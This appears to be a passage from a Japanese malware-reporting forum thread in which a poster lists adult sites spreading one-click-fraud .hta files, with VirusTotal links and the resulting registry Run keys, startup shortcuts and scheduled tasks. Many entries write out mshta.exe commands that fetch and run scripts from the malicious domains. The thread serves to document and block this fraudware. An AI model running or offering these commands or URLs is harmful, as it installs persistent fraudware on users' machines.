http://wniw5w.info/set_inf2.php?cccid=730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ The link place of "SystemFile" C:\Users\Cerberus\UserProfile\htmlapp.exe http://wniw5w.info/reg2.php?cccid=730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ&log=1 Startup on Registory HKCU:Run RegWrite730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ C:\Users\Cerberus\SoftRecovery\dat730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ.cmd HKCU:Run SystemBoot730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Startup on Registory HKCU:Run RegWrite730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ C:\Users\Cerberus\SoftRecovery\dat730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ.cmd HKCU:Run SystemBoot730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe SystemFile <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://wniw5w.info/reg2.php?cccid=730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ</Arguments> Re: WMV - 浦野 秀雄 2012/01/15(Sun) 23:27 No.22754 それぞれリストに入れました。

JPPorn 投稿者：いぬ 投稿日：2012/01/01(Sun) 23:01 No.22714    ワンクリウェア入り http://av-porn.info/ File name 「MovieID_KpUzK5fptCxTWTYXRidhYP5nhatuiC8N.hta」 http://www.virustotal.com/file-scan/report.html?id=f5b31335fefa7d46bab89c6985d7c097eaf8a6b29ac990b5bf63c75e0499a3b6-1325411290 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://av-porn.info/reg2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N Startup on Registory HKCU:Run RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N</Arguments> -------------------------------------------------------- http://olive-porn.info/ File name 「MovieID_WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c.hta」 http://www.virustotal.com/file-scan/report.html?id=2e9fddcae84fcb8670fc832ff939495c91ceb63b5c20de445439b8ff905af494-1325763145 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://olive-porn.info/reg2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c Startup on Registory HKCU:Run RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c</Arguments> EROSTAR - いぬ 2012/01/03(Tue) 20:51 No.22715 ワンクリウェア入り http://tvmk5t.info/ File name 「MovieID_SMcjKvnka5y5LeVXcsA9V5geqUqD623I.hta」 http://www.virustotal.com/file-scan/report.html?id=0d3729dae7379e75227f51896cb54717735c295694e289cd9cc46f04bdfbb7c9-1325564051 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootSMcjKvnka5y5LeVXcsA9V5geqUqD623I] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWriteSMcjKvnka5y5LeVXcsA9V5geqUqD623I] C:\Users\Cerberus\SoftRecovery\RegWriting.lnk O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe http://tvmk5t.info/set_inf2.php?cccid=SMcjKvnka5y5LeVXcsA9V5geqUqD623I The link place of "SystemFile" C:\Users\Cerberus\UserProfile\htmlapp.exe http://tvmk5t.info/reg2.php?cccid=SMcjKvnka5y5LeVXcsA9V5geqUqD623I Startup on Registory HKCU:Run RegWriteSMcjKvnka5y5LeVXcsA9V5geqUqD623I C:\Users\Cerberus\SoftRecovery\RegWriting.lnk HKCU:Run SystemBootSMcjKvnka5y5LeVXcsA9V5geqUqD623I C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Task Scheduler library <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://tvmk5t.info/set_inf2.php?cccid=SMcjKvnka5y5LeVXcsA9V5geqUqD623I</Arguments> Japanese Movies - いぬ 2012/01/03(Tue) 20:54 No.22716 ワンクリウェア入り http://hnil65h.info/ File name 「MovieID_ZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H.hta」 http://www.virustotal.com/file-scan/report.html?id=e7481f061e4710fb88818e45eca0dc00d88fb776305b370b3dda63c48d3b8150-1325568461 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://hnil65h.info/set_inf2.php?cccid=ZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://hnil65h.info/reg2.php?cccid=ZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H Startup on Registory HKCU:Run RegWriteZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://hnil65h.info/set_inf2.php?cccid=ZY0zX6fKndaHBmXMG8GZCVqHFE8LJM8H</Arguments> アダルトサイト - いぬ 2012/01/03(Tue) 20:56 No.22717 ワンクリウェア入り http://je0.sheepboat.com/ http://*.sheepboat.com/ File name 「FlvPlayer.hta」 http://www.virustotal.com/file-scan/report.html?id=df96fa8b5a0e38916cd15817f6fc7ec5702944cb289adacc2b6a88de418dd352-1325578195 C:\Users\Cerberus\AppData\Roaming\Adobe\WscMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [ThuuDriveGNOML] "C:\Users\Cerberus\AppData\Roaming\Identities\GNOML.lnk" O4 - HKCU\..\Run: [uranvs44879_972206907] "C:\Windows\system32\mshta" http://0c0a.sheepboat.com/pn89h/lfwhqoyEsnfT1o2Qkr-T2Q.htm The link place of "GNOML" C:\Users\Cerberus\AppData\Roaming\Adobe\WscMgr.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Adobe\Iolite64lYY.bin" Startup on Registory HKCU:Run ThuuDriveGNOML "C:\Users\Cerberus\AppData\Roaming\Identities\GNOML.lnk" HKCU:Run uranvs44879_972206907 "C:\Windows\system32\mshta" http://0c0a.sheepboat.com/pn89h/lfwhqoyEsnfT1o2Qkr-T2Q.htm ------------------------------------------------------- http://kty.arriveeat.info/ http://*.arriveeat.info/ File name 「FlvPlayer.hta」 http://www.virustotal.com/file-scan/report.html?id=0c1297dca9a83885690ca2d16c6e9915f9b53636250a584258ebb2481879400e-1325587079 C:\Users\Cerberus\AppData\Roaming\Identities\TosMsgAgt.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [WesserGPL(radbus)] "C:\Users\Cerberus\AppData\Roaming\Identities\radbus.lnk" O4 - HKCU\..\Run: [uranvs44879_837289006] "C:\Windows\system32\mshta" http://b4f3.arriveeat.info/d0y0frjl/hBYVIo~XIwrCTzFcpNqFRA.htm The link place of "radbus" C:\Users\Cerberus\AppData\Roaming\Identities\TosMsgAgt.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\LarimarfbkT" Startup on Registory HKCU:Run uranvs44879_837289006 "C:\Windows\system32\mshta" http://b4f3.arriveeat.info/d0y0frjl/hBYVIo~XIwrCTzFcpNqFRA.htm HKCU:Run WesserGPL(radbus) "C:\Users\Cerberus\AppData\Roaming\Identities\radbus.lnk" ----------------------------------------------------------- http://qbg.arriveeat.info/ http://g05.arriveeat.info/ http://*.arriveeat.info/ File name 「FlvPlayer.hta」 http://www.virustotal.com/file-scan/report.html?id=2769bd99a681c38d958b3da6a74e478169930648d1e95de0c6d79a1cd6226457-1325765873 C:\Users\Cerberus\AppData\Roaming\Macromedia\appMgr2.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [QSXPA(clusbers)] "C:\Users\Cerberus\AppData\Roaming\Identities\clusbers.lnk" O4 - HKCU\..\Run: [uranvs44879_972206907] "C:\Windows\system32\mshta" http://e8d4.sheepboat.com/sf/7KtoYwzxjuuAqdNCLsDyag.htm 画像が複数現れる事もあります。 The link place of "clusbers" C:\Users\Cerberus\AppData\Roaming\Macromedia\appMgr2.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\Scolecite70TDMW.bin" Startup on Registory HKCU:Run QSXPA(clusbers) "C:\Users\Cerberus\AppData\Roaming\Identities\clusbers.lnk" HKCU:Run uranvs44879_837289006 "C:\Windows\system32\mshta" http://2901.arriveeat.info/qn/ofecFqXHRoHjK9IsVrNwEA.htm HKCU:Run uranvs44879_972206907 "C:\Windows\system32\mshta" http://e8d4.sheepboat.com/sf/7KtoYwzxjuuAqdNCLsDyag.htm ------------------------------------------------------ http://3yu.comdlg.biz/ http://jww.comdlg.biz/ http://*.comdlg.biz/ http://www.virustotal.com/file-scan/report.html?id=028d378c7abdbab3e470cd103e8f37f8e7df60abc08aa9dc6846142cf9a433f8-1325767742 C:\Users\Cerberus\AppData\Roaming\Adobe\appMgr2.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [MetaRramePhotoSsript] "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\PhotoSsript.lnk" O4 - HKCU\..\Run: [uranvs44879_477189503] "C:\Windows\system32\mshta" http://6339.comdlg.biz/szwub/5c6keBSPQnL0~IjTTHFG4w.htm The link place of "PhotoSsript" C:\Users\Cerberus\AppData\Roaming\Adobe\appMgr2.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Identities\ApatiteLsLD.bin" Startup on Registory HKCU:Run MetaRramePhotoSsript "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\PhotoSsript.lnk" HKCU:Run uranvs44879_477189503 "C:\Windows\system32\mshta" http://6339.comdlg.biz/szwub/5c6keBSPQnL0~IjTTHFG4w.htm Avstyle - いぬ 2012/01/03(Tue) 20:58 No.22718 ワンクリウェア入り http://tequila.frankytube.net/ http://frankytube.net/ http://*.frankytube.net/ File name 「eroerobody_1325580747.hta」 http://www.virustotal.com/file-scan/report.html?id=08c743c1f33534ee2e2d0ae691e177ca937751c7885aeda0f7ad3604ada0fba0-1325580312 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [maxheart_8a07c858c5be02dc909f17cdea5d1a4f0ff61f168b0d68c7] C:\Users\Cerberus\AppData\Roaming\Microsoft\maxheart_8a07c858c5be02dc909f17cdea5d1a4f0ff61f168b0d68c7.vbs Startup on Registory HKCU:Run maxheart_8a07c858c5be02dc909f17cdea5d1a4f0ff61f168b0d68c7 C:\Users\Cerberus\AppData\Roaming\Microsoft\maxheart_8a07c858c5be02dc909f17cdea5d1a4f0ff61f168b0d68c7.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\maxheart_8a07c858c5be02dc909f17cdea5d1a4f0ff61f168b0d68c7.vbs</Command> WMV - いぬ 2012/01/04(Wed) 21:29 No.22719 ワンクリウェア入り http://donkey.deltakate.net/ http://deltakate.net/ http://*.deltakate.net/ File name 「sexpalyland_1325666137.hta」 http://www.virustotal.com/file-scan/report.html?id=38ccc17a26063e08676f5eebfdd434d1c25201ee83346922c800ba0c892fcaab-1325665715 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [armagedon_9a5f1a7418736bd796231107248d3552fea54bb33fadebb1] C:\Users\Cerberus\AppData\Roaming\Identities\armagedon_9a5f1a7418736bd796231107248d3552fea54bb33fadebb1.vbs Startup on Registory HKCU:Run armagedon_9a5f1a7418736bd796231107248d3552fea54bb33fadebb1 C:\Users\Cerberus\AppData\Roaming\Identities\armagedon_9a5f1a7418736bd796231107248d3552fea54bb33fadebb1.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Identities\armagedon_9a5f1a7418736bd796231107248d3552fea54bb33fadebb1.vbs</Command> エロサイト - いぬ 2012/01/04(Wed) 21:32 No.22721 ワンクリウェア入り http://judge.hyaperale.net/ http://hyaperale.net/ http://*.hyaperale.net/ File name 「peachesex_1325667253.hta」 http://www.virustotal.com/file-scan/report.html?id=5a75a2775fb5df78ed08926d93daf9c1762e7ba392b89e581b361ab87ebb11b4-1325666821 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [aqasoap_d2b93c393a460cc4b80d84540006ab37dc9389cf52299d05] C:\Users\Cerberus\AppData\Roaming\Identities\aqasoap_d2b93c393a460cc4b80d84540006ab37dc9389cf52299d05.vbs Startup on Registory HKCU:Run aqasoap_d2b93c393a460cc4b80d84540006ab37dc9389cf52299d05 C:\Users\Cerberus\AppData\Roaming\Identities\aqasoap_d2b93c393a460cc4b80d84540006ab37dc9389cf52299d05.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Identities\aqasoap_d2b93c393a460cc4b80d84540006ab37dc9389cf52299d05.vbs</Command> アダルトムービー - いぬ 2012/01/04(Wed) 21:35 No.22722 ワンクリウェア入り http://shell.delphilemur.net/ http://delphilemur.net/ http://*.delphilemur.net/ File name 「playroom_1325674686.hta」 http://www.virustotal.com/file-scan/report.html?id=25c2d752a1d6f4e13a33bc157cffede364ceb7c9cdf1f24544916e0dfc827d54-1325674254 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [neomachine_16bdf5ae8b522c063946dd5e28b533e037c9c207eb60b664] C:\Users\Cerberus\AppData\Roaming\Adobe\neomachine_16bdf5ae8b522c063946dd5e28b533e037c9c207eb60b664.vbs Startup on Registory HKCU:Run neomachine_16bdf5ae8b522c063946dd5e28b533e037c9c207eb60b664 C:\Users\Cerberus\AppData\Roaming\Adobe\neomachine_16bdf5ae8b522c063946dd5e28b533e037c9c207eb60b664.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\neomachine_16bdf5ae8b522c063946dd5e28b533e037c9c207eb60b664.vbs</Command> アダルト見放題 - いぬ 2012/01/04(Wed) 21:37 No.22723 ワンクリウェア入り http://gulf.mckenzierose.net/ http://mckenzierose.net/ http://*.mckenzierose.net/ File name 「onapeach_1325675776.hta」 http://www.virustotal.com/file-scan/report.html?id=8953a524163e84f398d10751c6b4e4d8d480e33ea9278c537ca6e0769bab2a74-1325675753 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [maronmoron_6420d270414c041bedebc79a2d21286deb5f8b2397d1e39d] C:\Users\Cerberus\AppData\Roaming\Adobe\maronmoron_6420d270414c041bedebc79a2d21286deb5f8b2397d1e39d.vbs Startup on Registory HKCU:Run maronmoron_6420d270414c041bedebc79a2d21286deb5f8b2397d1e39d C:\Users\Cerberus\AppData\Roaming\Adobe\maronmoron_6420d270414c041bedebc79a2d21286deb5f8b2397d1e39d.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\maronmoron_6420d270414c041bedebc79a2d21286deb5f8b2397d1e39d.vbs</Command> Adult site - いぬ 2012/01/04(Wed) 21:39 No.22724 ワンクリウェア入り http://dayday.adultredzone.net/ http://adultredzone.net/ http://*.adultredzone.net/ File name 「hypertikubeam_1325677194.hta」 http://www.virustotal.com/file-scan/report.html?id=43dd32db7b710871866cd348e42a376b27d4dc2569f8ef2049d46fc204bb8fc1-1325676760 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [paipanic_4c0796cfaf7973f5c7230ffe1ece01dd9f4718ea1d5e0370] C:\Users\Cerberus\AppData\Roaming\Microsoft\paipanic_4c0796cfaf7973f5c7230ffe1ece01dd9f4718ea1d5e0370.vbs Startup on Registory HKCU:Run paipanic_4c0796cfaf7973f5c7230ffe1ece01dd9f4718ea1d5e0370 C:\Users\Cerberus\AppData\Roaming\Microsoft\paipanic_4c0796cfaf7973f5c7230ffe1ece01dd9f4718ea1d5e0370.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\paipanic_4c0796cfaf7973f5c7230ffe1ece01dd9f4718ea1d5e0370.vbs</Command> ------------------------------------------------------- http://kendo.hiteldrun.net/ http://hiteldrun.net/ http://*.hiteldrun.net/ File name 「bodylanguage_1325715967.hta」 http://www.virustotal.com/file-scan/report.html?id=f7e98ba481063f8c75ec2aa5d66f3decadaff2c1d0cb7596a90675f07cac066b-1325715534 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [hitmanshow_943e82d7dbcf299cf8199765c19869badfce9d7dcb19a6ed] C:\Users\Cerberus\AppData\Roaming\Adobe\hitmanshow_943e82d7dbcf299cf8199765c19869badfce9d7dcb19a6ed.vbs Startup on Registory HKCU:Run hitmanshow_943e82d7dbcf299cf8199765c19869badfce9d7dcb19a6ed C:\Users\Cerberus\AppData\Roaming\Adobe\hitmanshow_943e82d7dbcf299cf8199765c19869badfce9d7dcb19a6ed.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\hitmanshow_943e82d7dbcf299cf8199765c19869badfce9d7dcb19a6ed.vbs</Command> エッチ動画 - いぬ 2012/01/05(Thu) 22:36 No.22725 ワンクリウェア入り http://vegetable.phosphorusoron.net/ http://mincer.phosphorusoron.net/ http://phosphorusoron.net/ http://*.phosphorusoron.net/ File name 「opaiipai_1325761685.hta」 http://www.virustotal.com/file-scan/report.html?id=cb71f23d12c54393f238dba86d5836f8e331d1ab55fbd7aedda916592e622579-1325761349 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [oseania_a840d6d7c39c8d2f530e40c437ca7d7cb57cc646db2502b5] C:\Users\Cerberus\AppData\Roaming\Macromedia\oseania_a840d6d7c39c8d2f530e40c437ca7d7cb57cc646db2502b5.vbs Startup on Registory HKCU:Run oseania_a840d6d7c39c8d2f530e40c437ca7d7cb57cc646db2502b5 C:\Users\Cerberus\AppData\Roaming\Macromedia\oseania_a840d6d7c39c8d2f530e40c437ca7d7cb57cc646db2502b5.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\oseania_a840d6d7c39c8d2f530e40c437ca7d7cb57cc646db2502b5.vbs</Command> Erofaita.Info - いぬ 2012/01/06(Fri) 22:10 No.22726 ワンクリウェア入り http://orange.erofaita.info/ http://*.erofaita.info/ File name 「MobileMovie.hta」 http://www.virustotal.com/file-scan/report.html?id=ffd2fb88a28206a8b485997b36d0a5555b32436878d1535e67734b7853e73722-1325842228 C:\Users\Cerberus\AppData\Roaming\Adobe\wmMsgSvr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [pxlm needlu] "C:\Users\Cerberus\AppData\Roaming\Identities\needlu.lnk" O4 - HKCU\..\Run: [jhm8789_795389203] "C:\Windows\system32\mshta" http://8f4f.erofaita.info/d00gyeby/JaiHtK-zCL~5dbAwTQvecw.htm The link place of "needlu" C:\Users\Cerberus\AppData\Roaming\Adobe\wmMsgSvr.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Adobe\occupy630nwR.bak" Startup on Registory HKCU:Run jhm8789_795389203 "C:\Windows\system32\mshta" http://8f4f.erofaita.info/d00gyeby/JaiHtK-zCL~5dbAwTQvecw.htm HKCU:Run pxlm needlu "C:\Users\Cerberus\AppData\Roaming\Identities\needlu.lnk" Adult.Movie-Aconite - いぬ 2012/01/06(Fri) 22:12 No.22727 ワンクリウェア入り http://gladiolus-movie.com/ File name 「movie_l1325851509.hta」 http://www.virustotal.com/file-scan/report.html?id=1c2b14dfaa5b322d92c90ed53fd9d075c678ef9d27ce6b252a39466caddf6968-1325851149 C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [heptalia] C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\heptalia\heptalia.hta" Startup on Registory HKCU:Run heptalia C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\heptalia\heptalia.hta" エロサイト - いぬ 2012/01/06(Fri) 22:14 No.22728 ワンクリウェア入り http://conductor.pinksweetsselect.net/ http://pinksweetsselect.net/ http://*.pinksweetsselect.net/ File name 「lovelycharmy_1325852840.hta」 http://www.virustotal.com/file-scan/report.html?id=51513c4c24b7ef89a46854e6a425d219e7f6ce09aa2d27190e8d8684411a1dcd-1325852482 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [magicalpon_96f8e46f42d4beb3ffd0e4420e33ea717f4994d6688216bb] C:\Users\Cerberus\AppData\Roaming\Microsoft\magicalpon_96f8e46f42d4beb3ffd0e4420e33ea717f4994d6688216bb.vbs Startup on Registory HKCU:Run magicalpon_96f8e46f42d4beb3ffd0e4420e33ea717f4994d6688216bb C:\Users\Cerberus\AppData\Roaming\Microsoft\magicalpon_96f8e46f42d4beb3ffd0e4420e33ea717f4994d6688216bb.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\magicalpon_96f8e46f42d4beb3ffd0e4420e33ea717f4994d6688216bb.vbs</Command> ADULT COLLECTION - いぬ 2012/01/07(Sat) 13:21 No.22729 ワンクリウェア入り http://www.bad-blood.info/ File name 「4737.hta」 http://www.virustotal.com/file-scan/report.html?id=b6f8ac3a265c74d7c110448bc543e156d1455eeae2c1198fa57276e569f0b61b-1325896461 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta http://www.bad-blood.info/regist2.php Re: JPPorn - 浦野 秀雄 2012/01/08(Sun) 17:46 No.22730 それぞれリストに入れました。

エッチ動画 投稿者：いぬ 投稿日：2011/12/26(Mon) 18:25 No.22700    ワンクリウェア入り http://cynical.boronplanet.net/ http://boronplanet.net/ http://*.boronplanet.net/ File name 「ahegaow_1324888643.hta」 http://www.virustotal.com/file-scan/report.html?id=0aa8310d4dc613a2d722696d3216a91924386820344bcfacfa62ae02bf9e71db-1324888294 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603] C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs Startup on Registor HKCU:Run peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603 C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs</Command> WMV - いぬ 2011/12/26(Mon) 18:27 No.22701 ワンクリウェア入り http://crutch.sequoiaemma.net/ http://sequoiaemma.net/ http://*.sequoiaemma.net/ File name 「kunnny_1324889614.hta」 http://www.virustotal.com/file-scan/report.html?id=2b5bab3cb27ab49fd946d25536a2c26df05a13419775654ee0ff31c7b608dbd9-1324889163 Startup on Registory HKCU:Run spreader_7b3a357debdaf1e76f229988de5326f38050b014475d1dfc C:\Users\Cerberus\AppData\Roaming\Microsoft\spreader_7b3a357debdaf1e76f229988de5326f38050b014475d1dfc.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\spreader_7b3a357debdaf1e76f229988de5326f38050b014475d1dfc.vbs</Command> C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [spreader_7b3a357debdaf1e76f229988de5326f38050b014475d1dfc] C:\Users\Cerberus\AppData\Roaming\Microsoft\spreader_7b3a357debdaf1e76f229988de5326f38050b014475d1dfc.vbs Avstyle - いぬ 2011/12/27(Tue) 23:26 No.22702 ワンクリウェア入り http://meal.sexchopper.net/ http://sexchopper.net/ http://*.sexchopper.net/ File name 「terabeppin_1324974746.hta」 Kaspersky 9.0.0.837 2011.12.27 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=c1e36b35fe16be27a1c8fb88af899df27453d482307de3aa5c52647617e87237-1324974297 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [spotlight_e07b06220120538f2ebb2ddb81847162aae2bfd61b9c8da2] C:\Users\Cerberus\AppData\Roaming\Adobe\spotlight_e07b06220120538f2ebb2ddb81847162aae2bfd61b9c8da2.vbs Startup on Registory HKCU:Run spotlight_e07b06220120538f2ebb2ddb81847162aae2bfd61b9c8da2 C:\Users\Cerberus\AppData\Roaming\Adobe\spotlight_e07b06220120538f2ebb2ddb81847162aae2bfd61b9c8da2.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\spotlight_e07b06220120538f2ebb2ddb81847162aae2bfd61b9c8da2.vbs</Command> Adult.Movie-Aconite - いぬ 2011/12/27(Tue) 23:28 No.22703 ワンクリウェア入り http://geranium-movie.com/ File name 「movie_l1324975898.hta」 Kaspersky 9.0.0.837 2011.12.05 HEUR:Trojan.Script.Generic http://www.virustotal.com/file-scan/report.html?id=4f04a5fba325c6627dca5ad9d53da4ffb1eaa141085350611cf8b25436c65377-1323171424 C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [hexalia] C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\hexalia\hexalia.hta" Startup on Registory HKCU:Run hexalia C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\hexalia\hexalia.hta" EROSTAR - いぬ 2011/12/27(Tue) 23:31 No.22704 ワンクリウェア入り http://wnie7lw.info/ File name 「MovieID_JYZRYfyIF6cXjl8sSPPg0mWVt2erV235.hta」 http://www.virustotal.com/file-scan/report.html?id=cf5b1aa79904ad22179848d2de24f62c0d71500ff108e481b2931111b0c65fe4-1324983052 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootJYZRYfyIF6cXjl8sSPPg0mWVt2erV235] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWriteJYZRYfyIF6cXjl8sSPPg0mWVt2erV235] C:\Users\Cerberus\SoftRecovery\RegWriting.lnk O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe http://wnie7lw.info/set_inf2.php?cccid=JYZRYfyIF6cXjl8sSPPg0mWVt2erV235 The link place of "SystemFile" C:\Users\Cerberus\UserProfile\htmlapp.exe http://wnie7lw.info/reg2.php?cccid=JYZRYfyIF6cXjl8sSPPg0mWVt2erV235 Startup on Registory HKCU:Run SystemBootJYZRYfyIF6cXjl8sSPPg0mWVt2erV235 C:\Users\Cerberus\UserProfile\SystemFile.lnk HKCU:Run RegWriteJYZRYfyIF6cXjl8sSPPg0mWVt2erV235 C:\Users\Cerberus\SoftRecovery\RegWriting.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Task Scheduler library Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://wnie7lw.info/set_inf2.php?cccid=JYZRYfyIF6cXjl8sSPPg0mWVt2erV235</Arguments> ------------------------------------------------------ http://ani74da.info/ File name 「MovieID_ZeSZquPxxNlYtflqrnOQwQiBdoZl8aed.hta」 http://www.virustotal.com/file-scan/report.html?id=2cf4dc775299973bd31a1b927c7b81a4c18c188b096fc33800da96fe8a6325e1-1325248992 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootZeSZquPxxNlYtflqrnOQwQiBdoZl8aed] 